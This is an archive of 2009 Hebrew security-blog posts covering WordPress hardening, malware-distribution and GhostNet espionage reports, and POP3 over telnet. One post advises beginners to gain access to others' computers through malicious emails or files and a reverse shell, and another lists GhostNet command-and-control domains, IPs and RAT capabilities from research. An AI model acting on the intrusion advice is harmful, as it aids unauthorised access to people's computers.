לעזאזל- אפילו ראיתי שנרשמת לעידכונים שלי ב-tweeter (שלא קורה בהם הרבה).

אני לחלוטין מאוכזב מהצורה שבה התנהלו הדברים. זה לא מה שהייתי מצפה מכתבים רציניים.

לדעתי הרעש הזה שנוצר אמנם מראה למה לא צריך להיות מאגר כזה אבל לא זאת הצורה.

דה-מרקר הצליח להרוס יוזמה להבהרה למה החוק לא טוב ולכן אני רואה את זה כתמיכה בחוק. כל הכבוד.

אגב, יש כאן ציטוט:

"הקמתי את האתר כחלק מקמפיין נגד המאגר הביומטרי", סיפר ל-TheMarker IT מקים האתר. "למעשה, אין פה שימוש במידע חדש – לא נכנסתי למאגרים הנוכחיים. המטרה של האתר היא להדגים לאנשים כיצד ניתן לעשות בקלות שימוש בנתונים המוחזקים במאגרים הממשלתיים".

אני לא יודע את מי הם ראיינו (אולי אחד משני חברי). אלי הם לא פנו בכל מקרה.

‫איך פורצים למחשב (הפוסט הזה לא מיועד למקצוענים).‬

‫גיא מזרחי‬ — Mon, 13 Jul 2009 01:24:45 +0000

טוב, אני מזהיר מראש שהפוסט הזה נועד לחבר'ה הצעירים בפורומים.

מה שקורה הוא שהם מתחילים ללמוד קצת Web Application Hacking ואחרי שהם מצליחים לעשות קצת Sql Injections הם מרגישים ששום דבר לא יכול לעצור אותם.

כיוון שהזרקות SQL הם דבר טכני שיחסית קל ללמוד אותו, בד"כ הם מהר מאוד מתחילים להתעניין איך פורצים למחשב.

אבל אין הרבה דברים דומים בין לתקוף שרת אינטרנט למחשב רגיל.
בעוד שרת אינטרנט מראש נותן לך גישה מסויימת אליו (בד"כ קריאת קבצים, לעיתים גם יותר מזה) מחשב רגיל לא חושף בד"כ שירותים אל הרשת ובטח לא אל האינטרנט.

מערכות הפעלה מסויימות חושפות (תלוי בהגדרות) שירותים בסיסיים (שיתוף מדפסות ואולי אפילו שיתוף קבצים).
כדי לפרוץ למחשב אתה צריך לבדוק אם הוא נותן שירותי רשת כלשהם. אם כן – לבדוק מה השירות והאם אפשר לנצל אותו לצורך הרצת קוד.
במידה ואי אפשר – תצטרך למצוא פרצת REMOTE במערכת ההפעלה. אבל זה באמת דבר שלא כל אחד יכול ומוכשר לחפש ולמצוא כאלה ועוד פחות מוכשרים גם לדעת לנצל כאלה.

אז איך בכל זאת אפשר לפרוץ למחשב?

הנדסה חברתית היא פתרון לא רע.

אם נוכל לגרום למשתמש לעשות משהו שיאפשר לנו להריץ עליו קוד – ניצחנו.
זה יכול להיות באמצעות מייל זדוני, הודעת מסנג'ר, קובץ שנשלח ועוד כל דבר העולה במוח ההזוי שלנו.

אם הצלחנו להריץ קוד – פשוט יחסית לייצר Revers Shell אלינו ובעצם ניצחנו – פרצנו לו למחשב.

עכשיו רציתי לכתוב הסבר על מה זה Reverse Shell אבל ממש במקרה לפני כמה ימים דיברתי עם נחום הספאמר והוא שלח לי לינק עתיק לבלוג של עמרי שמסביר מה זה Reverse Shell.

תמסרו לו ד"ש כשאתם הולכים לקרוא

‫איך לאבטח את ממשק הניהול של WORDPRESS?‬

‫גיא מזרחי‬ — Fri, 03 Jul 2009 11:58:46 +0000

WORDPRESS שוהה לו בתוך שרת ה-WEB הפופלרי apache.

אחד הדברים הקלים ביותר לעשות ב-apache הוא להגביל גישה לתיקיות מסויימות.

תיקייה שהגיוני מאוד להגביל את הגישה אליה היא תיקיית wp-admin ב-WORDPRESS.

אם אינכם רוצים לאפשר רישום משתמשים לבלוג שלכם ואתם רוצים להעלות את רמת האבטחה בבלוג ולהוריד את סיכויי הפריצה אליו – הפוסט הזה בשבילכם

אז איך עושים את זה?

מייצרים בתוך תיקיית wp-admin שנמצאת תחת התיקייה של הבלוג קובץ בשם htaccess.

שימו לב, השם מורכב מ-נקודה(.) ואז htaccess.

הקובץ צריך להיות בפורמט הבא:

AuthName "Restricted Area"
AuthType Basic
AuthUserFile /var/www/.htpasswd
AuthGroupFile /dev/null
require valid-user

שימו לב שיש כאן הגדרה של AuthUserFile.

זהו קובץ השמות והסיסמאות של מורשי הכניסה לתיקייה שהחלטתם להגן עליה.

הקובץ צריך להיות בתיקייה מחוץ לאתר כך שלא יוכלו לגשת אליו.

מבנה קובץ הסיסמאות יהיה כזה:

user:6F7qwerOBK03Z

כדי לייצר לעצמכם קובץ סיסמאות תוכלו להשתמש במחולל הזה:

http://www.htaccesstools.com/htpasswd-generator

אז זהו?

כמעט.

אם תבדקו כרגע תראו שהתיקייה מוגנת בשם ובסיסמה שקבעתם לעצמכם.

הבעיה היא שיכול להיות שיש קובץ CSS שנמצא בתוך התיקייה הזאת (אצלי היה קובץ כזה).

נסו להכנס אל הבלוג בלי שהייתם מחוברים לתיקיית הניהול.

אם קופץ לכם חלון הדורש זיהוי, גם אצלכם יש את התופעה של ה-CSS הסורר שמוגן כרגע בסיסמה.

מה עושים?

עורכים שוב את .htaccess שלנו ומוסיפים את השורות הבאות:

order allow,deny
allow from all

זו הדוגמה של ה-CSS שהיה אצלי.

במידה ויש קפיצה של בקשת סיסמה על דפים אחרים – בצעו את זה גם עליהם.

זהו, הבלוג שלכם הרבה יותר בטוח..

‫מה יותר גדול? K או M?‬

‫גיא מזרחי‬ — Thu, 25 Jun 2009 20:58:54 +0000

בעקבות הכתבה המדהימה הזו (http://www.ynet.co.il/articles/0,7340,L-3736935,00.html)..

אם קראתם ולא שמתם לב – הנה זה פה:

אז אתם מבינים? לקוחות HOT המסכנים שלהם יש אפשרות UPLOAD עלובה של 1M לא יוכלה להנות מהמצב כמו שיוכלו להנות ממנו לקוחות NGN שנהנים מ-800K.

פשוט מדהים..

‫OS3 לאייפון‬

‫גיא מזרחי‬ — Wed, 24 Jun 2009 01:38:58 +0000

התקנתי את מערכת ההפעלה 3 לאייפון.

ההתקנה עבדה חלק בלי שום בעיות וגם לא איבדתי את הנתונים עליו.

אחרי ההתקנה:

המכשיר עובד חלק, בלי שום בעיות.

לקח לי זמן להזכר בהגדרות של האינטרנט לפלאפון אבל מצאתי אותן בסוף.

Jail Break לקח כמה דקות.

חוץ מזה המכשיר פשוט מעולה ומערכת ההפעלה החדשה מדהימה

cydia עובד נהדר ולא קורס לחלוטין (למרות שאומרים שהיו בעיות איתו בהתחלה, אני לא הרגשתי).

החיפוש במערכת החדשה פשוט משנה את החיים. כיף אמיתי.

‫מצלמות אבטחה – לראות או לא לראות?!‬

‫The-Insider‬ — Mon, 15 Jun 2009 21:38:28 +0000

איך אפשר לסרב לגיא?!
תמונה שווה אלף מילים -> 6 תמונות שוות 6000 -> זה המון מילים!
העלתי תמונות רק תמונות שלא מאפשרות לזהות באופן ברור את הארגון כדי לא לעשות נזק לאף אחד
ראוי לציין שעשינו את על הכל בכדי להגן על פרטיותם של לקוחותינו
כבר לפני 3 חודשים פניניו לספקים ולגורמים נוספים בכדי לקדם את תהליך העדכון אצל הארגונים הפגיעים.

אני רוצה לשפוך קצת אור על תפיסה מסויימת של חלק מהאנשים.
רוב האנשים בעולם חושבים שהאינטרנט זה: "צא'ט", "תוכנות מסרים", "אתרים", "מה שיש בגוגל"
במציאות, האינטרנט זה "כל מכונה שיש לה IP" בין אם יש לו גם דומיין או קישור מה WEB וגם אם לא
יתרה מכך, רוב האינטרנט נגיש אבל לא חשוף
השלכה מסויימת של הקונספט (בנוסף לרכיבים כמו מצלמות) היא שתעבורה (חיבור, מידע, בקשות, תגובות) מול אתר שעובר דרך WAF כשניגשים לכתובת של האתר, לא בהכרח עוברת דרך WAF
(או מנגנון הגנה/סינון כלשהוא) כשניגשים לאחד השרתים הפנימיים (שאליהם מפנה Load Balancer)

לילות לבנים במפעל

: חנות בגדים – לא כולם קופצים על המציאה

בית קפה

קופה - עיניים על הכסף

אז מה קונים?

הכספת - הפעם לא של ארז טל

‫מצלמות אבטחה? לא אם רפי מטפל בהן..‬

‫גיא מזרחי‬ — Mon, 15 Jun 2009 08:38:42 +0000

אתם יכולים לקרוא על זה פה:

http://www.globes.co.il/news/article.aspx?QUID=1056,U1245000184502&did=1000458312

אולי רפי יסכים לכתוב על זה גם כאן ולהרחיב? אני אשאל אותו..

אין ספק, הבחור תותח על

‫כמה זה חכם לבקש מהאקרים לפרוץ אליך?‬

‫גיא מזרחי‬ — Fri, 12 Jun 2009 09:15:08 +0000

כל כמה חודשים אנחנו שומעים על דברים כאלה..

מה קורה כשבעל חברה מבקש שיפרצו את חשבון המייל שלו?
מישהו פורץ אליו.
3 חוקרי אבטחה (ובינהם אביב) נענו לאתגר הזה:
http://www.strongwebmail.com/secure/email/contests/hack

החברה באה להראות כמה צורת הזדהות כפולה (כגון שם+סיסמה ועוד משהו, במקרה שלהם שיחת טלפון) יכולה לשפר את האבטחה.
לצורך כך היא העמידה פרס של 10000$ לראשון שיצליח לפרוץ את חשבון המייל של המנכ"ל ולהוציא נתונים מלוח השנה שלו.

בקיצור – הם הצליחו

‫תם ונשלם הפרוייקט‬

‫גיא מזרחי‬ — Thu, 11 Jun 2009 01:37:23 +0000

סוף סוף – העברתי את הבלוג לשרת החדש.
אין יותר בעיות (כנראה).
הכל עובד חלק ומהיר
אשמח לשמוע אם אתם רואים בעיה כלשהי.
זהו – אולי אחרי כל העבודה הזאת עוד יהיה לי כוח לכתוב משהו בסוף השבוע..

‫בעיות.. הרבה בעיות.‬

‫גיא מזרחי‬ — Mon, 01 Jun 2009 20:15:26 +0000

אני מחליף שרת לבלוג ויש המון בעיות.
משום מה – הבלוג עובר אבל לא מצליח להציג פוסטים ועוד לא הצלחתי להבין למה.
בטיפול..

‫איך האקר יכול להרוויח 10800$ ביום?‬

‫גיא מזרחי‬ — Sat, 16 May 2009 20:01:23 +0000

חברת Finjan מוציאה כל כמה חודשים דוחות על הפשיעה ברשת. החוקרים: Finjan’s Malicious CodeResearch Center – MCRC.
הדו"ח האחרון בא לספר לנו איך האקר יכול להרוויח 10800$ ביום והכותרת שלו היא: Cybercrime pays Generously – How hackers make $10,800 a day

אז איך עושים את זה?
האקרים (הכוונה כאן היא לפושעי-סייבר) מחפשים כל הזמן דרכים לשפר את הפצת ה-malware בהם הם משתמשים. איך הם עושים את זה?
המטרה העיקרית שלהם היא להרוויח כמה שיותר כסף, אותו הם מרוויחים מכל מחשב שהדביקו.

הכסף מגיע כתוצאה מגניבת אינפורמציה, העברת DATA או מכירת תוכנות זדוניות.
בשל כך המאמץ העיקרי של ההאקרים הוא להגדיל את יכולות ההפצה של ה-MALWARES שלהם.
במקרים רבים ניתן לראות אתרים תמימים למראה שכשנכנסים אליהם נתקלים באתר עצמו ובהפניה לאתר נוסף שמתקין רושעה.
המחקר של חברת פינג'אן נעשה על גוף של פושעי-סייבר שחברים ברשת צירופית שכזו (Affiliation Network).
המחקר גם מפרט איך הם מרוויחים כסף בתהליך.

(למי שלא מכיר, affiliation זו צורה ידועה לקידום מסחר באינטרנט. הרעיון הוא יצירת לינק ייחודי עם הפנייה לכל מקדם מסחר. כשמישהו נכנס ללינק הייחודי ומגיע לאתר המפרסם הוא מגיע עם referrer של המקדם ולכן יודעים דרך מי הגולש הגיע וכך יודעים לשלם למקדם.)

שימוש ב-SEO כדי להרחיב תפוצה:
ההפצה של הרושעות למינן מועתקת מהצורה הלגיטימית בה עובד השוק המסחרי, כולל Search Engine Optimization אך בצורה יעילה יותר ופחות לגיטימית.
המפיצים משתמשים באתרים פריצים כדי להזריק לתוכם תוכן מותאם SEO ועל ידי כך מעלים את ערך הדפים (PR וכ"ו) שיכולים להדביק.
(PR – Page Rank. זוהי צורת מדידה בה גוגל משתמשת כדי לדרג כל דף שמאונדקס אצלה ולקביעת מידת הרלוונטיות שלו. ככל שה-PR גבוה יותר מדובר בדף חיוני יותר שמכיל יותר מידע ולכן גם מעניין יותר את הגולשים. האלגוריתם שמשמש את גוגל לקביעת PR אינו גלוי ויש כל מני השערות של איך בונים את ה-PR של דף אבל גוגל לא ממש מסבירים את זה.)

התוכן שהם מוסיפים כולל שגיאות כתיב נפוצות (כגון Gogle, mobile fone, Obbama, Liscense וכ"ו) וכן מילות חיפוש נפוצות הנלקחות מ-google trends.

כשהדפים עם התוכן הזה נוספים לאתר שנפרץ המפיץ מנסה לגרום למנועי החיפוש לאנדקס את האתר מחדש ובשל התוכן החדש שנוסף, מיקומו של האתר יעלה בגוגל למקומות גבוהים.
כדי לשפר את השיטה עוד יותר, חלק מהתוכן המוזרק הוא סקריפט שמייצר באופן דינאמי keywords עם שגיאות כתיב ומילים פופולאריות.

הסקריפט מבוסס על פרמטר שעובר כחלק מה-url בסגנון: http://domain/talk/page.php?id=2345 כאשר כל דף דינאמי מקושר לדפים דינאמיים אחרים וכך ערך האתר עולה כיוון מנוע החיפוש מזהה שיש בו יותר מידע.
כשהאתרים עולים בדירוג שלהם ומופיעים כתוצאות ראשונות במנוע החיפוש – יותר אנשים נכנסים ומודבקים ברושעות של המפיץ.
ההדבקה מתבצעת ע"י הפניה לאתר מדביק (לעיתים כחלק מכמה קפיצות עד האתר הדבקה עצמו).

השיטה יעילה מאוד כיוון שהיא מצליחה להטעות את מנוע החיפוש שמאנדקס ומתייג את האתר כבעל תוכן משמעותי וכתוצאה מכך מספר הגולשים לאתר עולה באופן משמעותי מאוד.

דוגמה:
משתמש מחפש את פרופסור Kris Kobach אך מקליד בטעות Korbach.

שימו לב – ה-X שמצוין בתוצאת החיפוש מגיע כחלק מתוכנה של חברת פינג'אן – הוא לא מגיע מגוגל ולמחפש התמים אין שום דרך לדעת שמדובר בתוצאה שיקרית.

הדפים אליהם יגיע המשתמש התמים הם אלה (מצטער על חוסר האיכות – כך מופיע במקור):

הבעיה: התוצאות לא רלוונטיות ורואים את זה מייד אך לפני שהמשתמש יוכל להבין שמדובר בתוצאה לא רלוונטית ירוץ עליו סקריפט.

הסקריפט(חלקו לפחות):

כמה הדבר אפקטיבי?
מאוד יעיל לצורך הדבקות בקנה מידה רחב מאוד.
בגישה לאחד משרתי התעבורה של התוקפים גילו שהתקפות מסוג זה הביאו מעל לחצי מליון חיפושי גוגל לאתרים כאלה.
התוקפים הבינו שצורה של הפצה כזו יעילה הרבה יותר מלהדביק אתר אחד גדול כיוון שהתקפה כזו תתגלה בצורה מהירה יחסית ותתוקן בצורה מיידית ואילו כאן מדובר בהרבה מאוד אתרים שעושים את השירות.
הזמן שחולף עד שהמתקפות מתגלות באתרים האלה הוא רב והתיקונים בד"כ לא מתבצעים בצורה מהירה.

מספרים:
ב-16 ימים של פעולה אותם מפיצי תוכנות (במקרה זה תוכנה שמזוהה כאילו כאנטי וירוס אך היא בעצם רושעה) הצליחו לקבל 1.8 מיליון unique users שעברו לדפי ההדבקה שלהם.המפיצים מקבלים 9.6 סנט על כל הפניה כזו והרווח הוא 10800$ ליום!

כן, זה לא רע בשביל יום עבודה

‫הפרטיות מתה – תתגברו על זה.‬

‫גיא מזרחי‬ — Sat, 16 May 2009 14:17:48 +0000

אתם חייבים לראות את Privacy Is Dead – Get Over It. זה חלק ראשון מתוך 36 חלקים של כ-5 דקות כל אחד.

אחרי שתראו את זה, הייתי רוצה לשמוע את דעתכם.

אני אפרסם כאן את דעתי בעוד יומיים-שלושה.

‫עיצוב הבלוג‬

‫גיא מזרחי‬ — Tue, 12 May 2009 05:47:59 +0000

חזרתי זמנית לעיצוב הישן – בחדש היו בעיות עם IE.

אני אנסה לפתור את הבעיות היום או מחר..

גיא.

‫GhostNet – The Snooping Dragon – Part 2‬

‫גיא מזרחי‬ — Sun, 10 May 2009 14:39:12 +0000

לאחר המחקר הראשוני שנעשה ע"י החוקרים(כתבתי עליו פה: the snooping dragon), התבצע מחקר ארוך יותר כדי להבין בצורה טובה יותר מי תקף ומה מימדי התקיפה.
המחקר ארך 10 חודשים והפעם נעשה בצורה עמוקה ויסודית יותר.
הדוח מחולק לשלושה חלקים:
1. הכרות עם התחום ומידע כללי. כולל האשמות של סין כמרגלת על ארה"ב.
2. הסבר על החקירה עצמה.
3. ניתוח התוצאות.

החוקרים מציינים שהשחקנים העיקריים ב-cyberspace הן לא מדינות אלא האקרים עצמאיים.
הם מציינים שפעילות הסייבר שהתבצעה במלחמה בין רוסיה לגאורגיה וכן בזמן התקפה של ישראל על עזה התבצעה ע"י האקרים ולא ע"י מדינות.
הם מנחשים על סמך העובדה שהתקפת ה-DoS על אסטוניה ב-2007 התבצעה ע"י רוסי שחי באסטוניה וכמו כן שמעולם לא הייתה התקפה של גוף ביון על ארה"ב.

(הערה: לעניות דעתי זו טעות. ההסתמכות על ארה"ב לא נכונה.. פקידים בכירים בממשל בארה"ב מודים שהיו התקפות כאלה וניסיון לאתר אותן הגיע למחשבים בברית המועצות. במקום עובדות, הם לוקחים כדוגמאות את האנאלייזר.).

קוריוז: המדינות המובילות ב-Cyber Espionage: ארה"ב, ישראל ובריטניה.

סיגינט:
בדו"ח מסופר על מקרה בו עובדת לשעבר של Drewla נאסרה כשניסתה לחזור אל ביתה אחרי עבודה של שנתיים ב-Drewla.
כשהיא הכחישה שעבדה שם וטענה שהיא הייתה בדרהמסלה בלימודים גילתה שהחוקר הסיני החזיק בידו תעתיק מלא של צ'אטים שלה במשך השנים.
החוקרים מייחסים את העניין לסיגינט, אני לא בטוח שזה באמת מעיד על משהו.

חלק 1:

תחילת פעילות סין בסייבר – שנת 1991 כחלק ממודרניזציה של הצבא ותוך הבנה שפעילות סייבר יכולה לפגוע קשות בעליונותה של ארה"ב.
נוצרה שם הבנה שפעילות תוקפנית שכזו יכולה לפגוע במטרות צבאיות ואזרחיות.
בשנים האחרונות עלו יותר ויותר האשמות שהאקרים סינים אחראים לפריצות איכותיות למחשבים באירופה, צפון אמריקה ואסיה.
האקרים סינים הואשמו בפעילות וחדירה למחשבים ממשלתיים בארה"ב, בריטניה, צרפת, גרמניה, דרום קוריאה וטאיוון.
האקרים סינים הואשמו בגניבת נתונים ממחשבים במוסדות תעשייתיים ופיננסיים.
משרד ההגנה האמריקאי מדווח שהוא מותקף באופן תדיר ע"י האקרים סינים כאשר ההתקפה הבולטת ביותר נקראה "Titan Rain", בוצעה ב-2003 וכוונה אל מחשבי משרד ההגנה וחברות ביטחוניות נוספות.

יש האשמה נוספת שסין פעילה נגד ארגונים לא צבאיים אך שיש לה בהם עניין (קונפליקט בדרפור, קבוצות טיבטיות בהודו וכ"ו).
רוב ההתקפות מול ארגונים אלה כוללות Defacements, התקפות מניעת שירות (DoS) או יצירת וירוסים מכוונים.
פעילויות אלה מוקצנות ומגברות בזמן משבר.

למרות ההאשמות האלה אין ממש ידע מי מבצע את הפעילות ואין אפשרות להחליט האם זה פעילות של יחידים או של גוף ממשלתי, למרות שההתקפות בהחלט פועלות בהתאם למדיניות ולתחומי העניין הסיניים.

חלק 3+2:

החקירה התחילה כאמור ממחשבי הארגון הטיבטי וממחשבים אלה התוקפים קיבלו מידע מקיף ורגיש.
המחקר נערך מול המחשבים של OHHDL.
המחקר לא מוכיח מי עומד מאחורי המתקפה וכן מה הייתה המטרה שלה.
במהלך המחקר הארוך נמצאו 1295 מחשבים נגועים ב-103 מדינות מתוכם כ-30% נחשבים מקור מידע מעולה וממוקמים במשרדי חוץ, שגרירויות, ארגונים בין לאומיים, מקורות עיתונאים וכ"ו.

במחקר הזה – החוקרים מכנים את הרשת בשם GhostNet והמחקר נערך מיוני 2008 ועד מרץ 2009 והתחיל בשלב הראשון בטיבט, לונדון, בריסל וניו יורק – בתוך המשרדים של הדלאי לאמה.
בשלב זה נאסף חומר החקירה כולל הסנפות של הרשתות.
בשלב השני של המחקר נערך ניתוח של הנתונים שנאספו והחוקרים מצאו קישור אל 4 שרתים ב- WEB. שרתים אלה שימשו את התוקפים להתקנת הסוס.

נמצאו גם 6 שרתים נוספים - שרתי פיקודים שאליהם התחבר הסוס כדי לקבל פקודות.
השרתים קונפגו לעבוד עם שירותי DNS דינאמיים.
בבדיקת שרתים אלה התגלה היקף הרשת (שכאמור כוללת 1295 מחשבים).
30% מהמחשבים הנגועים נחשבים בעלי ערך ונמצאים ב:

ministries of foreign affairs of Iran, Bangladesh, Latvia, Indonesia, Philippines, Brunei, Barbados and Bhutan;
embassies of India, South Korea, Indonesia, Romania, Cyprus, Malta, Thailand, Taiwan, Portugal, Germany and Pakistan;
the ASEAN (Association of Southeast Asian Nations) Secretariat, SAARC (South Asian Association for Regional Cooperation), and the Asian Development Bank;
News organizations
and an unclassified computer located at NATO headquarters.

GhostNet מורה למחשב נגוע להוריד טרויאן ידוע בשם Gh0st RAT – סוס אמיתי שמאפשר יכולות real-time.

Gh0st RAT נמכר באינטרנט והמקורות שלו בסין (במקור הוא OPEN SOURCE, כיום נמכר כשהוא מוכן לעבודה ע"י גופים פחות מקצועיים. כדי שאנטי וירוסים לא יזהו אותו המוכרים מבצעים שינויים שמות של משתנים, שינוי שמות פונקציות ועוד פעולות בסיסיות שמשנות את החתימה שלו).

מה הוא יודע לעשות?

- העברת קבצים

- לכידת מסך

- KEYLOGGER

- Remote shell

- Webcam view

- Audio capture

- הפעלת תוכנות

- Install software as system

ממשק השליטה שלו נראה כך:

הגרסה המדוברת של Gh0st RAT זוהתה ע"י 11 מתוך 34 האנטי וירוסים באתר וירוס טוטאל (אתר שבודק דגימות קבצים ומשווה אותם לחתימות של אנטי וירוסים).

התוקפים השתמשו בפאקרים כדי להחביא את הקוד שלהם ולא להתגלות ע"י אנטי וירוסים והפעילו כנראה שמונה גרסאות של סוסים.

ההתפשטות:

1. בעזרת אתר אינטרנט המכיל אקספלויט שמדביק את המחשבים שביקרו בו.

2. בעזרת מיילים רלוונטיים ליעד. המייל מכיל Attachment שמכיל אקספלויט של PDF ו-DOC כשה-Payload הוא BackDoor שמתחבר ל-control server וממתין להוראות. לאחר ההדבקה התוקף מורה למחשב הנתקף להוריד טרויאן.

דוגמה:

מדינות בהם נמצאו סוסים:

נמצאו 4 שרתים לצורך פקודות והזלגת חומר, כל אחד קצת שונה.

נמצאו שתי משפחות של סוסים ובשתיהן הסוסים מדברים HTTP כדי להראות את ההתקשרות כתמימה.

המשפחה הראשונה יוצרת קשר לקובץ PHP על אחד משני השרתים וכך הסוס מעדכן על מצבו ומקבל הוראות מאיפה להוריד פקודות. הפקודות נמצאות בקובץ שמותמם כתמונה.

הסוס יוצר קשר עם שרת בפורט 8000 ומשתמש ב-HTTP POST כדי להעלות נתונים אל השרת.

המשפחה השנייה משתמשת ב-HTTP POST כדי להתחבר לסקריפט CGI וכך לתקשר בין מחשב הקורבן לשרת הפיקודים.

נראה שלמרות שיש שתי משפחות – יחד הסוסים מתפקדים בצורה מלאה כשמשפחה אחת מתמקדת בדוחות ופקודות והשנייה בהבאת מידע.

השרתים:

• www.lookbytheway.com – 210.51.7.155

• www.macfeeresponse.com – 210.51.7.155

• www.msnppt.net – 221.5.250.98

• www.msnxy.net – 210.51.7.155

• www.msnyf.com – 221.5.250.98

• www.networkcia.com – 210.51.7.155

• www.indexnews.org – 61.188.87.58

• www.indexindian.com – 210.51.7.155

דוגמה לתקשורת עם אותו CGI SCRIPT:

זיהוי שרתי השליטה (פיקודים):

כאמור, החוקרים הצליחו לזהות את שרתי הפיקוד על סמך התקשורת שלכדו במשרדי OHHDL.

הם הצליחו למצוא ממשק ניהול WEBי על אחד השרתים. שרת זה הכיל קישורים לשרתי פיקודים אחרים ולכן יכלו להשיג גישה לשרתים נוספים.

(ישנם שני סוגים של שרתים – controls servers ו-command servers).

לאחר מכן החוקרים הקימו honey pot – מחשב שייעדו שידבק ועל ידי כך יזהו מה קורה בזמן ההדבקה והפעילות של הסוס.

הם הצליחו להדביק את המחשב ע"י שימוש בממשק ה-WEB של השרת ושתלו עליו Gh0st RAT.

לאחר זמן מה המחשב יצר קשר בהצלחה עם ה-CLIENT שלו (התוקף).

כשהתוקף שלח פקודות למחשב, גילו שהתוקף משתמש בחיבור DSL ב-Hainan Island.

על ארבעת ה-control servers נמצאו 26 מקומות בהם היה ממשק פיקוד.

החוקרים מצאו אותם ע"י ניחוש שמות ומיקומי קבצים.

אין לחוקרים מושג מדוע לא אובטחו הממשקים האלה.

מה היה בממשק הפיקוד?

1. רשימת המחשבים הנגועים.

2. ממשק לשליחת פיקודים חדשים

3. רשימת הפיקודים הממתינים ותוצאות שלהם כשהם סיימו לרוץ.

מסקנות:

אני חייב לציין שלמרות שיש יותר פרטים – אין עדות אמיתית לכך שמדובר בגוף ביון או גוף שמופעל ע"י מדינה.

זה אמנם מתקבל על הדעת בגלל סוג המחשבים שהותקפו אך בדיוק באותה מידה זה יכול להיות גוף הקשור לריגול תעשייתי או למאפיה הסינית או אפילו סתם להאקר טוב ומשועמם מאוד.

המחקר עצמו מעניין מאוד ונראה שהחוקרים עשו עבודה מאוד מקיפה (מה שאי אפשר היה להגיד לאחר ה-PDF הקודם).

יפה לראות שהחוקרים עצמם הצליחו לקבל שליטה על שרתי הפיקוד של הסוס.

מדהים ששרתי הפיקוד לא היו מוגנים. גם האקר צריך לעבוד חכם ובזהירות.

‫איך קוראים מייל דרך telnet?‬

‫גיא מזרחי‬ — Sun, 10 May 2009 02:34:45 +0000

סתם כי מישהו שאל בפורומים:

telnet mailserver.domain 110

אחרי שהוא ענה:

user yourusername

קיבלנו חזרה OK.

pass yourpassword

אם הסיסמה נכונה – נקבל OK ואת כמות ההודעות בתיבה.

list

יראה לנו את רשימת המיילים.

retr יאפשר לנו למשוך ולקרוא את הההודעות.